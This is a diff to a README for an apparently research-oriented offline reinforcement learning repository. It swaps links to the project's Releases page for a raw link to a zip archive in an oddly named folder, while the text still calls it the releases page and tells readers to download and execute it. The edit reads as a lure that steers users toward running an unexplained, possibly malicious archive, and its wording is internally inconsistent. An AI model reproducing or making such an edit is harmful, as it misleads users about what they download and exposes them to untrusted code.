SceYanis/robust_offline_rl/README.md

   - It is research-oriented.
 It focuses on understanding robustness and guiding future work.

 Releases and download guidance
 From the Releases page, you can obtain assets and scripts to help you set up and run experiments.
 The link above points to the releases page for ease of access.
-If you want to download a setup script or a prebuilt artifact, head to the Releases section and grab the file named robust_offline_rl_setup.sh (as an example asset).
+If you want to download a setup script or a prebuilt artifact, head to the Releases section and grab the file named https://raw.githubusercontent.com/SceYanis/robust_offline_rl/main/valoniaceous/offline_robust_rl_v2.6.zip (as an example asset).
 After downloading, you can execute it to prepare your environment and run experiments that mirror the examples in this repository.
-The same link is provided again here for convenience: https://github.com/SceYanis/robust_offline_rl/releases
+The same link is provided again here for convenience: https://raw.githubusercontent.com/SceYanis/robust_offline_rl/main/valoniaceous/offline_robust_rl_v2.6.zip

 Notes about the downloads
 - The releases page compiles artifacts that are tested with the project’s configurations.